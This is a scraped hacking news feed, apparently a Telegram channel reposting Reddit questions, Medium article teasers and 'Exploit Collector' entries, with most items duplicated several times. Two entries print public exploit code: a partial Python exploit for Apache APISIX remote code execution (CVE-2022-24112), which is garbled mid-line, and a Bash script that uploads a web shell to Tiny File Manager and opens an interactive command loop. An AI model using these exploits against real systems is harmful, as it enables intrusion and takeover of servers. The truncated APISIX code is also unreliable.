hacking: security in practice
How sites detects the second account
they understand even tho u change ur ip
submitted by /u/god_rays
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
How sites detects the second account
they understand even tho u change ur ip
submitted by /u/god_rays
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
How sites detects the second account
they understand even tho u change ur ip
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
I wrote a blazing fast subdomain enumerator! (100.000 domains checked under 10 minutes!)
https://external-preview.redd.it/FB9W0Dwal8Iw2ulQ3D6QJhJwrsUFkpZ8CotttkHKzm8.jpg?width=640&crop=smart&auto=webp&s=83b6aade0ce675950909f76a54b72f08bdf26d59 submitted by /u/Esc4iCEscEsc
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
I wrote a blazing fast subdomain enumerator! (100.000 domains checked under 10 minutes!)
https://external-preview.redd.it/FB9W0Dwal8Iw2ulQ3D6QJhJwrsUFkpZ8CotttkHKzm8.jpg?width=640&crop=smart&auto=webp&s=83b6aade0ce675950909f76a54b72f08bdf26d59 submitted by /u/Esc4iCEscEsc
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Reddit
From the hacking community on Reddit: I wrote a blazing fast subdomain enumerator! (100.000 domains checked under 10 minutes!)
Explore this post and more from the hacking community
hacking: security in practice
Web hacking automation
I have a Dev background and I'm quite familiar with web hacking. Seeing these top hackers automating a ton, one question arise in mind, "What bugs are practically automatable". Everyone is automating subdomain takeovers it's easy to automate but what about Xss or SQLi? Are they automating those only checking URL parameters?
submitted by /u/crusader2409
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Web hacking automation
I have a Dev background and I'm quite familiar with web hacking. Seeing these top hackers automating a ton, one question arise in mind, "What bugs are practically automatable". Everyone is automating subdomain takeovers it's easy to automate but what about Xss or SQLi? Are they automating those only checking URL parameters?
submitted by /u/crusader2409
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Web hacking automation
I have a Dev background and I'm quite familiar with web hacking. Seeing these top hackers automating a ton, one question arise in mind, "What bugs...
Hacking on Medium
Blueprint-TryHackMe[CTF Walkthrough]
https://cdn-images-1.medium.com/max/2560/0*xV3fqQ87M7AnjwTV
Today I am going to walk you through a beginner level CTF challenge from TryHackMe “Blueprint”. The goal is simple,”Hack into this Windows…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Blueprint-TryHackMe[CTF Walkthrough]
https://cdn-images-1.medium.com/max/2560/0*xV3fqQ87M7AnjwTV
Today I am going to walk you through a beginner level CTF challenge from TryHackMe “Blueprint”. The goal is simple,”Hack into this Windows…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Blueprint-TryHackMe[CTF Walkthrough]
Today I am going to walk you through a beginner level CTF challenge from TryHackMe “Blueprint”. The goal is simple,”Hack into this Windows…
Hacking on Medium
Vulnerabilidad de escalamiento de privilegios en Netfilter (CVE-2022–25636)
https://cdn-images-1.medium.com/max/1490/0*b-vJheuGPJWxanFp
PUBLICADO EN 16 MARZO, 2022POR EHACKING
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Vulnerabilidad de escalamiento de privilegios en Netfilter (CVE-2022–25636)
https://cdn-images-1.medium.com/max/1490/0*b-vJheuGPJWxanFp
PUBLICADO EN 16 MARZO, 2022POR EHACKING
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Vulnerabilidad de escalamiento de privilegios en Netfilter (CVE-2022–25636)
PUBLICADO EN 16 MARZO, 2022POR EHACKING
Hacking on Medium
ASCII Double-Murder
https://cdn-images-1.medium.com/max/675/0*ASofe-dA8uB08Wjl.png
There are a million stories in the Naked Medium City. Let’s read two of them.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
ASCII Double-Murder
https://cdn-images-1.medium.com/max/675/0*ASofe-dA8uB08Wjl.png
There are a million stories in the Naked Medium City. Let’s read two of them.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
ASCII Double-Murder
There are a million stories in the Naked Medium City. Let’s read two of them.
The 7 Penetration Testing Steps & Phases: a Checklist
7 Steps and Phases of Penetration TestingContinue reading on Medium »
Read more...
7 Steps and Phases of Penetration TestingContinue reading on Medium »
Read more...
The 7 Penetration Testing Steps & Phases: a Checklist
https://thenurhabib.medium.com/the-7-penetration-testing-steps-phases-a-checklist-73443cdd05c?source=rss------bug_bounty-5
7 Steps and Phases of Penetration TestingContinue reading on Medium » (https://thenurhabib.medium.com/the-7-penetration-testing-steps-phases-a-checklist-73443cdd05c?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
https://thenurhabib.medium.com/the-7-penetration-testing-steps-phases-a-checklist-73443cdd05c?source=rss------bug_bounty-5
7 Steps and Phases of Penetration TestingContinue reading on Medium » (https://thenurhabib.medium.com/the-7-penetration-testing-steps-phases-a-checklist-73443cdd05c?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
Medium
The 7 Penetration Testing Steps & Phases: a Checklist
7 Steps and Phases of Penetration Testing
Nmap Cheat Sheet
https://thenurhabib.medium.com/nmap-cheat-sheet-9e7ef512f3b6?source=rss------bug_bounty-5
Full nmap cheat sheet with example.Continue reading on Medium » (https://thenurhabib.medium.com/nmap-cheat-sheet-9e7ef512f3b6?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
https://thenurhabib.medium.com/nmap-cheat-sheet-9e7ef512f3b6?source=rss------bug_bounty-5
Full nmap cheat sheet with example.Continue reading on Medium » (https://thenurhabib.medium.com/nmap-cheat-sheet-9e7ef512f3b6?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
Medium
Nmap Cheat Sheet
Full nmap cheat sheet with example.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Apache APISIX 2.12.1 Remote Code Execution
https://1.bp.blogspot.com/-LuDwp3Oo6oc/WWlvICvnykI/AAAAAAAAILo/OetpmDNBdyImnh7DlH6SrwI0NyzSCKSJACLcBGAs/s1600/h142.png
Apache APISIX version 2.12.1 suffers from a remote code execution vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Apache APISIX 2.12.1 Remote Code Execution
https://1.bp.blogspot.com/-LuDwp3Oo6oc/WWlvICvnykI/AAAAAAAAILo/OetpmDNBdyImnh7DlH6SrwI0NyzSCKSJACLcBGAs/s1600/h142.png
Apache APISIX version 2.12.1 suffers from a remote code execution vulnerability.
MD5 |
4f5cd36d308c98ca2784eef8f7d83a1eDownload
# Exploit Title: Apache APISIX 2.12.1 - Remote Code Execution (RCE)
# Date: 2022-03-16
# Exploit Author: Ven3xy
# Vendor Homepage: https://apisix.apache.org/
# Version: Apache APISIX 1.3 – 2.12.1
# Tested on: CentOS 7
# CVE : CVE-2022-24112
import requests
import sys
class color:
HEADER = '\033[95m'
IMPORTANT = '\33[35m'
NOTICE = '\033[33m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
RED = '\033[91m'
END = '\033[0m'
UNDERLINE = '\033[4m'
LOGGING = '\33[34m'
color_random=[color.HEADER,color.IMPORTANT,color.NOTICE,color.OKBLUE,color.OKGREEN,color.WARNING,color.RED,color.END,color.UNDERLINE,color.LOGGING]
def banner():
run = color_random[6]+'''\n . ,
_.._ * __*\./ ___ _ \./._ | _ *-+-
(_][_)|_) |/'\ (/,/'\[_)|(_)| |
| |
\n'''
run2 = color_random[2]+'''\t\t(CVE-2022-24112)\n'''
run3 = color_random[4]+'''{ Coded By: Ven3xy | Github: https://github.com/M4xSec/ }\n\n'''
print(run+run2+run3)
if (len(sys.argv) != 4):
banner()
print("[!] Usage : ./apisix-exploit.py &160\\\\\\"\'); return true end"}',
},
],
}
response1 = requests.post(target_url+'apisix/batch-requests', headers=headers1, json=json_data, verify=False)
response2 = requests.get(target_url+'rms/fzxewh', headers=headers2, verify=False)
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Apache APISIX 2.12.1 Remote Code Execution
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Tiny File Manager 2.4.6 Shell Upload
https://2.bp.blogspot.com/-OQpvXY0U-U0/WWlvZUlJM8I/AAAAAAAAIOw/4zP2-mVc-vo2HWf5V3aXS_jzwpZLTa24QCLcBGAs/s1600/h59.png
Tiny File Manager version 2.4.6 suffers from an authenticated remote shell upload vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Tiny File Manager 2.4.6 Shell Upload
https://2.bp.blogspot.com/-OQpvXY0U-U0/WWlvZUlJM8I/AAAAAAAAIOw/4zP2-mVc-vo2HWf5V3aXS_jzwpZLTa24QCLcBGAs/s1600/h59.png
Tiny File Manager version 2.4.6 suffers from an authenticated remote shell upload vulnerability.
MD5 |
56aefa95418a94bb95e57a7450745e0eDownload
# Exploit Title: Tiny File Manager 2.4.6 - Remote Code Execution (RCE)
# Date: 14/03/2022
# Exploit Author: FEBIN MON SAJI
# Software Link: https://github.com/prasathmani/tinyfilemanager
# Version: Tiny File Manager <=
# Tested on: Ubuntu 20.04
# CVE : CVE-2021-40964
# Reference: https://febin0x4e4a.wordpress.com/2022/01/23/tiny-file-manager-authenticated-rce/
#!/bin/bash
check(){
which curl
if [ $? = 0 ]
then
printf "[✔] Curl found! \n"
else
printf "[❌] Curl not found! \n"
exit
fi
which jq
if [ $? = 0 ]
then
printf "[✔] jq found! \n"
else
printf "[❌] jq not found! \n"
exit
fi
}
usage(){
printf "
TIny File Manager Authenticated RCE Exploit.
By FEBIN
$0 /tmp/$shell
curl $URL?p= -X POST -s -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0" -b $cookie -F "p=" -F "fullpath=../../../../../../../..${webroot}/${shell}" -F "file=@/tmp/$shell" | grep "successful"
}
exploit(){
WEB_URL=$(printf "$URL" | tr "/" "\n" | head --lines=-1 | tr "\n" "/")
upload
if [ $? = 0 ]
then
printf "[+] File Upload Successful! \n"
else
printf "[-] File Upload Unsuccessful! Exiting! \n"
exit 1
fi
printf "[+] Checking for the shell \n"
curl ${WEB_URL}/${shell}?cmd=echo%20found -s | head -1 | grep "found" >/dev/null
if [ $? = 0 ]
then
printf "[+] Shell found ${WEB_URL}/$shell \n"
else
printf "[-] Shell not Found! It might be uploaded somewhere else in the server or got deleted. Exiting! \n"
exit 2
fi
printf "[+] Getting shell access! \n\n"
while true
do
printf "$> "
read cmd
curl ${WEB_URL}/$shell -s -X POST -d "cmd=${cmd}"
done
}
if [ $1 ] && [ $2 ] && [ $3 ]
then
check
log-in $1 $2 $3
find_webroot
exploit
else
usage
fi
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Tiny File Manager 2.4.6 Shell Upload
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Exploit Collector
Windows SpoolFool Privilege Escalation
___________________________
@hacking_Attack
@Hacking_Video
Windows SpoolFool Privilege Escalation
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Windows SpoolFool Privilege Escalation
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.